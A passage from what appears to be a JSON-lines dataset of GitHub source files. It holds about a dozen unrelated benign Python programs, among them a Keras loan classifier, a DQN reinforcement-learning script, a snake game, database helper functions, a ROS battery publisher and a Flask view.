'int64'}\n }\n\n mock_data = {}\n\n for key in test_cases.keys():\n mock_data[key] = test_cases[key]['series']\n\n mock_df = pd.DataFrame(data=mock_data)\n\n for index, series in mock_df.items():\n self.assertEqual('object', series.dtype)\n\n mock_df = mock_df.apply(boxscores.set_dtypes)\n\n for index, series in mock_df.items():\n self.assertEqual(test_cases[series.name]['dtype'], series.dtype)\n","repo_name":"nuggsrocks/nba-stats","sub_path":"tests/boxscores_test.py","file_name":"boxscores_test.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11378690482","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.models import load_model\nfrom sklearn.metrics import classification_report\n\n\ndef feat_info(col_name):\n print(data_info.loc[col_name]['Description'])\n\n\ndef fill_mort_acc(total_acc, mort_acc):\n if np.isnan(mort_acc):\n return total_acc_avg[total_acc]\n else:\n return mort_acc\n\n\ndata_info = pd.read_csv('lending_club_info.csv', index_col='LoanStatNew')\ndf = pd.read_csv('lending_club_loan_two.csv')\n\n# sns.countplot(x='loan_status', data=df)\n# plt.figure(figsize=(12,4))\n# sns.distplot(df['loan_amnt'], kde=False, bins=40)\n\n# print(df.corr()['loan_amnt'].sort_values(ascending=False))\n# plt.figure(figsize=(12,7))\n# sns.heatmap(df.corr(), annot=True, cmap='viridis')\n\n# feat_info('installment')\n# feat_info('loan_amnt')\n\n# sns.scatterplot(x='installment', y='loan_amnt', data=df, alpha=0.5)\n\n# sns.boxplot(x='loan_status', y='loan_amnt', data=df)\n\n# 
print(df.groupby('loan_status')['loan_amnt'].describe())\n# print(df['grade'].unique())\n# print(df['sub_grade'].unique())\n\n# sns.countplot(x='grade', data=df, hue='loan_status')\n# plt.figure(figsize=(12,4))\n# sns.countplot(x='sub_grade', data=df, palette='coolwarm', order=sorted(df['sub_grade'].unique()))\n\ndf['loan_repaid'] = df['loan_status'].map({'Fully Paid': 1, 'Charged Off': 0})\n# df.corr()['loan_repaid'].sort_values().drop('loan_repaid').plot(kind='bar')\n\n# print(100*(df.isnull().sum()/len(df)))\ndf = df.drop('emp_title', axis=1)\n# sns.countplot(x='emp_length', data=df, order=['< 1 year',\n# '1 year',\n# '2 years',\n# '3 years',\n# '4 years',\n# '5 years',\n# '6 years',\n# '7 years',\n# '8 years',\n# '9 years',\n# '10+ years'], hue='loan_repaid')\n# plt.show()\n# emp_fp = df[df['loan_status']=='Fully Paid'].groupby('emp_length').count()['loan_status']\n# emp_co = df[df['loan_status']=='Charged Off'].groupby('emp_length').count()['loan_status']\n# print(emp_co/emp_fp)\n\ndf = df.drop('emp_length', axis=1)\n# similar ratios between different loan statuses\ndf = df.drop('title', axis=1)\n# similar to purpose also it has null values\n# print(df['mort_acc'].value_counts())\n\n# print(corr()['mort_acc']) total_acc has highest correlation with mort_acc\ntotal_acc_avg = df.groupby('total_acc').mean()['mort_acc']\ndf['mort_acc'] = df.apply(lambda x: fill_mort_acc(x['total_acc'], x['mort_acc']), axis=1)\ndf = df.dropna()\n# drop the NaN values as they are very less in number probably around 500\n# print(df.isnull().sum())\n\n# print(df.select_dtypes(['object']).columns)\n# returns columns with string datatype\n\ndf['term'] = df['term'].apply(lambda term: int(term[:3]))\ndf = df.drop('grade', axis=1)\n\ndummies = pd.get_dummies(df['sub_grade'], drop_first=True)\ndf = pd.concat([df.drop('sub_grade', axis=1), dummies], axis=1)\n\ndummies = pd.get_dummies(df[['verification_status', 'application_type', 'initial_list_status', 'purpose']], drop_first=True)\ndf = pd.concat([df.drop(['verification_status', 'application_type', 'initial_list_status', 'purpose'], axis=1), dummies], axis=1)\n\ndf['home_ownership'] = df['home_ownership'].replace(['NONE', 'ANY'], 'OTHER')\ndummies = pd.get_dummies(df['home_ownership'], drop_first=True)\ndf = pd.concat([df.drop('home_ownership', axis=1), dummies], axis=1)\n\ndf['zip_code'] = df['address'].apply(lambda z: z[-5:])\ndummies = pd.get_dummies(df['zip_code'], drop_first=True)\ndf = pd.concat([df.drop('zip_code', axis=1), dummies], axis=1)\ndf = df.drop('address', axis=1)\n\ndf = df.drop('issue_d', axis=1)\n# case of data leakage\ndf['earliest_cr_year'] = df['earliest_cr_line'].apply(lambda d: int(d[-4:]))\ndf = df.drop('earliest_cr_line', axis=1)\ndf = df.drop('loan_status', axis=1)\n#print(df['purpose'].value_counts())\n\n# conversion of dataframe values to numpy array is important step as tensorflow only works on arrays\nX = df.drop('loan_repaid', axis=1).values\ny = df['loan_repaid'].values\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=101)\n\nscaler = MinMaxScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\nmodel = Sequential()\n# first layer add same number of neurons as number of rows then decrease in the later layers\nmodel.add(Dense(78, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(39, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(19, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(1, 
activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam')\n\nmodel.fit(x=X_train, y=y_train, epochs=25, batch_size=256, validation_data=(X_test, y_test))\nmodel.save('loan.h5')\n\nlosses = pd.DataFrame(model.history.history)\n# losses.plot()\n# plt.show()\n\npredictions = model.predict_classes(X_test)\nprint(classification_report(y_test, predictions))\n","repo_name":"KRUPESHT/Tensorflow_with_Keras","sub_path":"Keras API Project.py","file_name":"Keras API Project.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35899681302","text":"import json\n\nfrom bot.models.database.postgresql.model import asyncPostgresModel\n\n\nasync def insert_keyword(user_id: int, keyword: list[dict[str, list[str]]]):\n result = None\n try:\n query = '''INSERT INTO schema.youtube(user_id, keyword) VALUES($1, $2) \n ON CONFLICT DO NOTHING'''\n json_data = json.dumps(keyword, indent=4, ensure_ascii=False)\n result = await asyncPostgresModel.executeone(query, [user_id, json_data])\n except Exception: # noqa\n await update_keyword(user_id, keyword)\n return result\n\n\nasync def update_keyword(user_id: int, keyword: list[dict[str, list[str]]]):\n query = '''UPDATE schema.youtube SET keyword = $2 WHERE user_id = $1'''\n json_data = json.dumps(keyword, indent=4)\n result = await asyncPostgresModel.executeone(query, [user_id, json_data])\n return result\n\n\nasync def fetchone_keyword(user_id: int) -> list[dict[str, list[str]]]:\n query = '''SELECT keyword FROM schema.youtube WHERE user_id = $1'''\n result = await asyncPostgresModel.fetchone(query, [user_id])\n return json.loads(result.get('keyword'))\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\nasync def insert_search_option(user_id: int, option: str, target_quantity: int, parsing_delay: int):\n query = '''INSERT INTO schema.youtube(user_id, search_option, target_quantity, parsing_delay) \n VALUES($1, $2, $3, $4) ON CONFLICT DO NOTHING'''\n result = await asyncPostgresModel.executeone(query, [user_id, option, target_quantity, parsing_delay])\n if result == 'INSERT 0 0':\n await update_search_option(user_id, option, target_quantity, parsing_delay)\n return result\n\n\nasync def update_search_option(\n user_id: int,\n search_filter: str = None,\n target_quantity: int = None,\n parsing_delay: int = None\n):\n \"\"\"\n option or target_quantity or parsing_delay\n :param user_id:\n :param search_filter:\n :param target_quantity:\n :param parsing_delay:\n :return:\n \"\"\"\n result = None\n if search_filter:\n query = '''UPDATE schema.youtube SET search_option = $2 WHERE user_id = $1'''\n result = await asyncPostgresModel.executeone(query, [user_id, search_filter])\n if target_quantity:\n query = '''UPDATE schema.youtube SET target_quantity = $2 WHERE user_id = $1'''\n result = await asyncPostgresModel.executeone(query, [user_id, target_quantity])\n if parsing_delay:\n query = '''UPDATE schema.youtube SET parsing_delay = $2 WHERE user_id = $1'''\n result = await asyncPostgresModel.executeone(query, [user_id, parsing_delay])\n return result\n\n\nasync def fetchone_search_filter(user_id: int) -> str:\n query = '''SELECT search_option FROM schema.youtube WHERE user_id = $1'''\n result = await asyncPostgresModel.fetchone(query, [user_id])\n return result.get('search_option')\n\n\nasync def fetchone_target_quantity(user_id: int) -> int:\n query = '''SELECT 
target_quantity FROM schema.youtube WHERE user_id = $1'''\n result = await asyncPostgresModel.fetchone(query, [user_id])\n return result.get('target_quantity')\n\n\nasync def fetchone_parsing_delay(user_id: int) -> int:\n query = '''SELECT parsing_delay FROM schema.youtube WHERE user_id = $1'''\n result = await asyncPostgresModel.fetchone(query, [user_id])\n return result.get('parsing_delay')\n\n# ----------------------------------------------------------------------------------------------------------------------\n","repo_name":"coolworld2049/youtube_search_bot","sub_path":"bot/models/database/postgresql/youtube_api.py","file_name":"youtube_api.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27793126974","text":"def play(game, rl, iteration, human_transition=None, human_ctrl=False, screen=True):\n human_ctrl_cnt = 0\n human_a = 0\n step = 0\n if not human_transition:\n human_transition = []\n else:\n human_ctrl = False\n for t in human_transition:\n rl.store_transition(t[0], t[1], t[2], t[3])\n step += 1\n \n total_score = []\n episode = 0\n start_train = False\n while episode < iteration:\n s = game.reset()\n done = False\n descent = 1\n performance = 0\n while not done:\n if screen: game.render()\n a = rl.actor(s)\n if human_ctrl:\n if not human_ctrl_cnt:\n try:\n human_a = int(input('input action 0~{}: '.format(game.action_space.n - 1)))\n if human_a < 0 or human_a > 2:\n human_a = 1\n except ValueError:\n human_a = 1\n human_ctrl_cnt = 20\n else:\n human_ctrl_cnt -= 1\n a = human_a\n\n s_, r, done, _ = game.step(a)\n performance += r\n position, velocity = s_\n r = abs(position + .52) / 1.12 + abs(velocity) / .07 - 1\n if done: r = 10\n rl.store_transition(s, a, r, s_)\n if step >= mem_size:\n if not start_train:\n human_ctrl = False\n start_train = True\n break\n rl.learn()\n else:\n human_transition.append((s, a, r, s_))\n s = s_\n step += 1\n # if start_train:\n # if not step % 500: print('Timestep {} get score: {}'.format(step, sum(total_score[-500:])))\n # total_score.append(performance)\n # if step == iteration:\n # break;\n if start_train and step > mem_size:\n print('Episode {} get score: {}'.format(episode, performance))\n total_score.append(performance)\n episode += 1\n\n return total_score, human_transition\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-i',\n default='100',\n dest='ITERATION',\n help='input the iteration of training')\n\n parser.add_argument('-m',\n default='10000',\n dest='MEMORYSIZE',\n help='input the size of memory')\n\n parser.add_argument('-b',\n default='32',\n dest='BATCHSIZE',\n help='input the size of batch')\n\n parser.add_argument('-lr',\n default='0.0005',\n dest='LEARNINGRATE',\n help='input learning rate')\n\n parser.add_argument('-hu',\n default='',\n dest='HUMANEXP',\n help='input human experience')\n\n parser.add_argument('-hu--out',\n default='',\n dest='HUMANEXPOUT',\n help='human experience output path')\n\n parser.add_argument('-score--out',\n default='score.pkl',\n dest='SCOREOUT',\n help='score output path')\n\n parser.add_argument('-screen',\n default='true',\n dest='SCREEN',\n help='show the screen of game (true/false)')\n\n args = parser.parse_args()\n \n import gym\n from src.rl import RL\n import matplotlib.pyplot as plt\n import numpy as np\n import sys\n import matplotlib\n import matplotlib.patches as mpatches\n matplotlib.use('Agg')\n\n try:\n iteration 
= int(args.ITERATION)\n mem_size = int(args.MEMORYSIZE)\n batch_size = int(args.BATCHSIZE)\n except ValueError:\n print('error: iteration or memory size must be an integer')\n sys.exit()\n\n try:\n lr = float(args.LEARNINGRATE)\n except ValueError:\n print('error: learning rate must be an number')\n sys.exit()\n\n # game = gym.make('CartPole-v0')\n game = gym.make('MountainCar-v0')\n game = game.unwrapped\n\n rl_prioritized = RL(game.observation_space.shape[0] , range(game.action_space.n), batch_size=batch_size, memory_size=mem_size, prior=True, verbose=False, lr=lr)\n rl_dqn = RL(game.observation_space.shape[0] , range(game.action_space.n), batch_size=batch_size, memory_size=mem_size, prior=False, verbose=False, lr=lr)\n\n import pickle\n\n if args.HUMANEXP == '':\n human_transition = None\n else:\n with open(args.HUMANEXP, 'rb') as f:\n human_transition = pickle.load(f)\n \n hu_ctrl = False if args.HUMANEXPOUT == '' else True\n screen = False if args.SCREEN.upper() == 'FALSE' else True\n\n print()\n print(\"Prioritized experience replay:\")\n score_a, human_transition = play(game, rl_prioritized, iteration, human_transition, human_ctrl=hu_ctrl, screen=screen)\n print()\n print(\"Uniform sampling:\")\n score_b, _ = play(game, rl_dqn, iteration, human_transition, screen=screen)\n \n if hu_ctrl:\n with open(args.HUMANEXPOUT, 'wb') as f:\n pickle.dump(human_transition, f, -1)\n\n with open(args.SCOREOUT, 'wb') as f:\n pickle.dump({'a': score_a, 'b': score_b}, f, -1)\n \n pic = rl_prioritized.draw_policy()\n\n plt.figure(figsize=(6, 6))\n plt.imshow(pic, extent=[-1.2,.6,-.7,.7])\n red_patch = mpatches.Patch(color='red', label='push left')\n green_patch = mpatches.Patch(color='green', label='no push')\n blue_patch = mpatches.Patch(color='blue', label='push right')\n plt.legend(handles=[red_patch, green_patch, blue_patch])\n plt.xlabel('position')\n plt.ylabel('velocity')\n plt.show()\n\n plt.plot(range(len(score_a)), score_a, c='r', label='DQN with prioritized replay')\n plt.plot(range(len(score_b)), score_b, c='b', label='DQN')\n\n plt.show()\n","repo_name":"yutongshen/RL-DoubleDQN-PrioritizedReplay","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"10813838823","text":"from graphics import Canvas\nimport time\nimport random\n\nCANVAS_WIDTH = 400\nCANVAS_HEIGHT = 400\nSIZE = 20\nDELAY = 0.1\n\ndef main():\n # Set up the world\n canvas = Canvas(CANVAS_WIDTH, CANVAS_HEIGHT)\n player = canvas.create_rectangle(0, 0, SIZE, SIZE, 'blue')\n target = create_random_target(canvas)\n\n current_direction = \"right\"\n\n # Animation loop\n while True:\n # Update the world for one heartbeat\n current_direction = changedirection(canvas, current_direction)\n\n if current_direction == \"right\":\n canvas.move(player, SIZE, 0)\n elif current_direction == \"left\":\n canvas.move(player, -SIZE, 0)\n elif current_direction == \"up\":\n canvas.move(player, 0, -SIZE)\n elif current_direction == \"down\":\n canvas.move(player, 0, SIZE)\n\n # Check for out of bounds\n player_x = canvas.get_left_x(player)\n player_y = canvas.get_top_y(player)\n if player_x < 0 or player_x >= CANVAS_WIDTH or player_y < 0 or player_y >= CANVAS_HEIGHT:\n game_over(canvas)\n break\n\n # Check for collision with the goal\n if check_collision(canvas, player, target):\n canvas.delete(target)\n target = create_random_target(canvas)\n\n # Sleep\n time.sleep(DELAY)\n\ndef changedirection(canvas, 
current_direction):\n key = canvas.get_last_key_press()\n if key == 'ArrowLeft' and current_direction != \"right\":\n return \"left\"\n elif key == 'ArrowRight' and current_direction != \"left\":\n return \"right\"\n elif key == 'ArrowUp' and current_direction != \"down\":\n return \"up\"\n elif key == 'ArrowDown' and current_direction != \"up\":\n return \"down\"\n else:\n return current_direction\n\ndef create_random_target(canvas):\n rand_x = random.randint(0, CANVAS_WIDTH - SIZE)\n rand_y = random.randint(0, CANVAS_HEIGHT - SIZE)\n while rand_x % SIZE != 0:\n rand_x = random.randint(0, CANVAS_WIDTH - SIZE)\n while rand_y % SIZE != 0:\n rand_y = random.randint(0, CANVAS_HEIGHT - SIZE)\n return canvas.create_rectangle(rand_x, rand_y, rand_x + SIZE, rand_y + SIZE, 'orange')\n\ndef check_collision(canvas, obj1, obj2):\n obj1_leftx = canvas.get_left_x(obj1)\n obj1_topy = canvas.get_top_y(obj1)\n obj2_leftx = canvas.get_left_x(obj2)\n obj2_topy = canvas.get_top_y(obj2)\n return (obj1_leftx == obj2_leftx and obj1_topy==obj2_topy)\n\ndef game_over(canvas):\n canvas.create_text(CANVAS_WIDTH / 2, CANVAS_HEIGHT / 2, text='Game Over',color = 'red')\n\nif __name__ == '__main__':\n main()\n","repo_name":"taozhaojun/codeinplace2023","sub_path":"baby snake/babysnake.py","file_name":"babysnake.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39029211167","text":"from items.item import Item\nfrom actionable import WithActions, Action\nfrom worker import ServiceException\nimport collections\n\nFileResponse=collections.namedtuple(\"FileResponse\", [\"name\", \"length\", \"block_yielder\"])\n\n@WithActions\nclass FileItem(Item):\n\n def __init__(self):\n super(FileItem, self).__init__()\n\n @Action(\"_init\", \"system\")\n def init(self, worker):\n worker.create_initial_file_version()\n\n @Action(\"put\", \"editor\", _file_data=\"\")\n def put_file(self, worker,\n _file_data):\n return self.put_file_previous(worker, None, _file_data)\n\n @Action(\"put\", \"editor\", previous=\"\", _file_data=\"\")\n def put_file_previous(self, worker,\n previous: \"int: Previous version of the file that new version is based on.\",\n _file_data):\n file_version, file_length, file_hash = worker.write_file_data(previous, _file_data)\n self.props[\"file_version\"] = file_version\n self.props[\"file_length\"] = file_length\n self.props[\"file_hash\"] = file_hash\n self.modified=True\n return self.get_metadata(worker)\n\n @Action(\"put\", \"editor\", file_version=\"\", block_number=\"\", _file_data=\"\")\n def put_file_block(self, worker,\n file_version: \"int: Version of the file\",\n block_number: \"int: Block number\",\n _file_data):\n worker.write_block_data(file_version, block_number, _file_data, False)\n\n @Action(\"put\", \"editor\", file_version=\"int:\", block_number=\"int:\", last_block=\"bool:\", _file_data=\"\")\n def put_file_block_completed(self, worker,\n file_version: \"int: Version of the file\",\n block_number: \"int: Block number\",\n last_block: \"bool: Is this the last block in the file?\",\n _file_data):\n result = dict()\n block_hash = None\n if len(_file_data) > 0:\n block_hash = worker.write_block_data(file_version, block_number, _file_data, last_block)\n if last_block:\n file_length, file_hash = worker.finalize_file_version(file_version, block_number)\n self.props[\"file_length\"] = file_length\n self.props[\"file_hash\"] = file_hash\n self.props[\"file_version\"] = file_version\n self.modified = 
True\n result = self.get_metadata(worker)\n if block_hash:\n result[\"props\"][\"block_hash\"] = block_hash\n else:\n result[\"block_hash\"] = block_hash\n return result\n\n @Action(\"get\", \"reader\")\n def get_file(self, worker) -> \"binary\":\n \"\"\" Return the current version of a file \"\"\"\n return self.get_file_version(worker, self.props[\"file_version\"])\n\n @Action(\"get\", \"reader\", view=\"meta\")\n def get_file_meta(self, worker):\n return self.get(worker)\n\n @Action(\"get\", \"reader\", file_version=\"int:\")\n def get_file_version(self, worker,\n file_version: \"Version of the file to return\") -> \"binary\":\n \"\"\" Return a specified version of a file \"\"\"\n file_length = worker.get_file_length(file_version)\n if file_length is None:\n raise ServiceException(404, \"Bad file_version: {}\".format(file_version))\n def get_blocks():\n for block_number in [block_info[\"block_number\"] for block_info in worker.list_file_blocks(file_version)]:\n yield worker.get_block_data(file_version, block_number)\n return FileResponse(self.name, file_length, get_blocks)\n\n @Action(\"get\", \"reader\", versions=\"true\")\n def list_versions(self, worker):\n return worker.list_file_versions()\n\n @Action(\"post\", \"editor\", previous_version=\"int:\")\n def post_file_version_length(self, worker,\n previous_version):\n \"\"\" Create a new file based on a previous version \"\"\"\n result = dict()\n result[\"file_version\"] = worker.create_file_version(previous_version)\n return result\n\n @Action(\"get\", \"reader\", list_blocks=\"bool:true\", file_version=\"int:\")\n def list_blocks(self, worker, file_version):\n return worker.list_file_blocks(file_version)\n\n @Action(\"get\", \"reader\", file_version=\"int:\", block_number=\"int:\")\n def get_file_block(self, worker, file_version, block_number):\n block_data = worker.get_block_data(file_version, block_number)\n def get_blocks():\n yield block_data\n return FileResponse(self.name, len(block_data), get_blocks)\n\n @staticmethod\n def list_property_selector(public_data):\n result = dict()\n props = public_data[\"props\"]\n result[\"file_version\"] = props[\"file_version\"]\n result[\"file_hash\"] = props[\"file_hash\"]\n result[\"file_length\"] = props[\"file_length\"]\n return result\n\n","repo_name":"arethuza/perspective7","sub_path":"items/file_item.py","file_name":"file_item.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73447016146","text":"# 햄버거 다이어트\nT = int(input())\nfor TC in range(1, T+1):\n N, L = map(int, input().split())\n T = []\n K = []\n result = 0\n for n in range(N):\n Ti, Ki = map(int, input().split())\n T.append(Ti)\n K.append(Ki)\n for i in range(1 << N):\n sumK = sumT = 0\n for j in range(N):\n if i & (1 << j):\n sumK += K[j]\n sumT += T[j]\n if sumK <= L:\n if sumT > result:\n result = sumT\n print(\"#{} {}\".format(TC, result))\n\n'''\nPowerset 다시 생각해보기!!\n'''","repo_name":"eunzi-kim/CODE_Practice","sub_path":"SWEA/D3/5215.py","file_name":"5215.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73477030225","text":"def palindrome(str):\r\n stack=[]\r\n queue=[]\r\n \r\n # Better code : stack=list(str) and queue=list(reverse(str))\r\n for i in str:\r\n stack.append(i)\r\n queue.insert(0,i)\r\n \r\n #Better Code : return(stack==queue)\r\n while stack and queue:\r\n if stack.pop()==queue.pop():\r\n 
continue\r\n        else:\r\n            return(False)\r\n    return(True)\r\n    \r\nprint(palindrome(\"racecar\"))","repo_name":"Shreyansh-Agarwal2022/Python-DSA","sub_path":"DSA Python Learning/Practice Question/palindrome_using_stack_queue.py","file_name":"palindrome_using_stack_queue.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"15781394512","text":"# N adventurers. Each adventurer has a fear level written as a number.\n# An adventurer with fear level x must join an adventurer group of at least x members to be able to travel.\n# Some adventurers may stay behind in the village. 1 <= N <= 100,000. What is the maximum number of groups that can be formed?\n# 2 3 1 2 2\n\nn = int(input())\n\nguild = list(map(int,input().split()))\n\nguild.sort()\n\ngroup = 0\ncnt = 1\n\nfor i in range(len(guild)):\n    guild[i] -= cnt\n\n    if guild[i] <= 0:\n        group += 1\n        cnt = 1\n    \n    else:\n        cnt += 1\n\nprint(guild)\nprint(group)\n\n# 1 2 2 2 3 cnt = 1, group = 0\n# 0 2 2 2 3 cnt = 1, group = 1\n# 0 1 2 2 3 cnt = 2, group = 1\n# 0 1 0 2 3 cnt = 1, group = 2\n# 0 1 0 1 3 cnt = 2, group = 2\n# 0 1 0 1 1 cnt = 3, group = 2\n# A group is formed at each position in the list where the value becomes 0 or smaller.\n\n","repo_name":"gun-0208/studying_algorithm","sub_path":"이것이 코딩테스트다/ch11_그리디_01.py","file_name":"ch11_그리디_01.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"41617504951","text":"# Definition for a Node.\nclass Node:\n    def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n        self.val = int(x)\n        self.next = next\n        self.random = random\n\n\nclass Solution:\n    \"\"\"\n    Description:\n        A linked list is given such that each node contains an additional random pointer which could point to any node in the list or null.\n        Return a deep copy of the list.\n        The Linked List is represented in the input/output as a list of n nodes.
Each node is represented as a pair of [val, random_index] where:\n val: an integer representing Node.val\n random_index: the index of the node (range from 0 to n-1) where random pointer points to, or null if it does not point to any node.\n Idea:\n Main problem is absence of *new* random node to point to.\n So use either HashTable or point cur.next to new node to another and few passes throught the nodes\n Complexity:\n Time: O(n)\n Space: O(n) with hashtable and O(1) without\n\n \"\"\"\n def copyRandomList(self, head: 'Node') -> 'Node':\n \"\"\"\n table = {}\n cur = head\n while cur:\n table[cur] = Node(cur.val)\n cur = cur.next\n\n cur = head\n while cur:\n table[cur].next = table[cur.next] if cur.next else None\n table[cur].random = table[cur.random] if cur.random else None\n cur = cur.next\n return table[head] if head else None\n \"\"\"\n\n if not head:\n return head\n cur = head\n while cur:\n new_node = Node(cur.val)\n new_node.next = cur.next\n cur.next = new_node\n cur = cur.next.next\n\n cur = head\n while cur:\n if cur.random:\n cur.next.random = cur.random.next\n cur = cur.next.next\n new_head = head.next\n pold = head\n pnew = new_head\n while pnew.next:\n pold.next = pnew.next\n pold = pold.next\n pnew.next = pold.next\n pnew = pnew.next\n\n pnew = None\n pold = None\n return new_head\n","repo_name":"g0t0wasd/leetcode_solutions","sub_path":"138_copy_list_with_random_pointer_medium.py","file_name":"138_copy_list_with_random_pointer_medium.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7998170092","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import Int64, Bool, String\n\nBATTERY = 100\n\ndef battery_info(battery):\n pub = rospy.Publisher('chatter', Int64, queue_size = 10)\n rospy.init_node('battery_info', anonymous = True)\n rate = rospy.Rate(100) #publish for 100 Hz rate\n while not rospy.is_shutdown():\n battery_int = BATTERY\n rospy.loginfo(battery_int)\n pub.publish(battery_int)\n rate.sleep()\n\n\ndef low_battery_alert(battery):\n pub = rospy.Publisher('chatter', Bool, queue_size = 10)\n rospy.init_node('low_battery_alert', anonymous = True)\n rate = rospy.Rate(100)\n while not rospy.is_shutdown():\n if battery <= 15:\n battery_alert = True\n else:\n battery_alert = False\n rospy.loginfo(battery_alert)\n pub.publish(battery_alert)\n rate.sleep()\n\ndef battery_information_msg(battery, alert):\n pub = rospy.Publisher('chatter', String, queue_size = 10)\n rospy.init_node('battery_information_msg', anonymous = True)\n rate = rospy.Rate(100)\n while not rospy.is_shutdown():\n battery_information_string = 'Current battery status is %d'%battery\n if alert:\n battery_information_string += ' LOW BATTERY!'\n rospy.loginfo(battery_information_string)\n pub.publish(battery_information_string)\n rate.sleep()\n\nif __name__ == \"__main__\":\n try:\n battery_info(BATTERY)\n # bool = low_battery_alert(BATTERY)\n # battery_information_msg(BATTERY, bool)\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Guerilla-Coders/Delievery-Arcade-Agent","sub_path":"practice/battery_pub.py","file_name":"battery_pub.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28019000812","text":"#!/usr/bin/env python3\n\nimport csv\n\n\npapers = dict()\n\nwith open(\"cgo18-authors.csv\") as infile:\n reader = csv.reader(infile)\n next(reader, 
None)  # skip the headers\n    for row in reader:\n        _, title, firstname, surname, _, affil, _ = row\n        author = ' '.join((firstname, surname))\n        if title not in papers:\n            papers[title] = [(author, affil)]\n        else:\n            papers[title].append((author, affil))\n\nfor paper in sorted(papers, key=lambda s: s.lower()):\n    print(f'{paper}')\n    current_affil = None\n    for i, (author, affil) in enumerate(papers[paper]):\n        if current_affil and affil != current_affil:\n            print(f' ({current_affil})', end=\"\")\n            current_affil = affil\n        elif not current_affil:\n            current_affil = affil\n        if i:\n            print(', ', end=\"\")\n        print(author, end=\"\")\n    print(f' ({current_affil})
\\n')\n","repo_name":"ChrisCummins/cgo2018","sub_path":"scripts/make-list-of-accepted-papers.py","file_name":"make-list-of-accepted-papers.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27459028895","text":"from flask import Blueprint, render_template, flash, redirect, url_for\n\nfrom src import crud\nfrom src.models.snippet import SnippetModel\nfrom src.modules.add_snippet.forms import AddSnippetForm\n\nadd_snippet_blueprint = Blueprint(\n 'add_snippet',\n __name__,\n template_folder='templates/add_snippet',\n)\n\n\n@add_snippet_blueprint.route('/add-snippet', methods=['GET', 'POST'])\ndef index():\n form = AddSnippetForm()\n\n if form.validate_on_submit():\n if form.code.data == \"\":\n flash(\"Code field can't be empty\", \"error\")\n return render_template('add_snippet.html', form=form)\n\n snippet = SnippetModel(\n name=form.name.data,\n language=form.language.data,\n code=form.code.data\n )\n crud.snippet.create(obj_new=snippet)\n flash('Snippet added successfully', 'success')\n\n return redirect(url_for(\"index.index\"))\n\n return render_template('add_snippet.html', form=form)\n","repo_name":"NickNaskida/CodeTyper","sub_path":"src/modules/add_snippet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32391576914","text":"import numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom Projects.KalmanSmoother.__init__ import ROOT_DIR\nbase_dir = ROOT_DIR+'/Data/output/'\nfrom GeneralUtilities.Filepath.instance import FilePathHandler\nfrom KalmanSmoother.Utilities.__init__ import ROOT_DIR as ROOT_DIR_PLOT\nimport pickle\nfrom GeneralUtilities.Plot.Cartopy.eulerian_plot import BaseCartopy\nimport cartopy.crs as ccrs\nimport matplotlib\nfrom KalmanSmoother.Utilities.Floats import DIMESAllFloats,WeddellAllFloats\nfrom geopy.distance import GreatCircleDistance\nfrom KalmanSmoother.Utilities.Utilities import speed_calc\nfrom KalmanSmoother.Utilities.Filters import Smoother,ObsHolder\nfrom KalmanSmoother.Utilities.DataLibrary import dimes_position_process,dimes_velocity_process,dimes_depth_noise,dimes_stream_noise,dimes_toa_noise,dimes_interp_noise\nfrom KalmanSmoother.Utilities.DataLibrary import weddell_position_process,weddell_velocity_process,weddell_depth_noise,weddell_stream_noise,weddell_toa_noise,weddell_interp_noise\n\nfile_handler = FilePathHandler(ROOT_DIR_PLOT,'FinalFloatsPlot')\nmatplotlib.rcParams.update({'font.size': 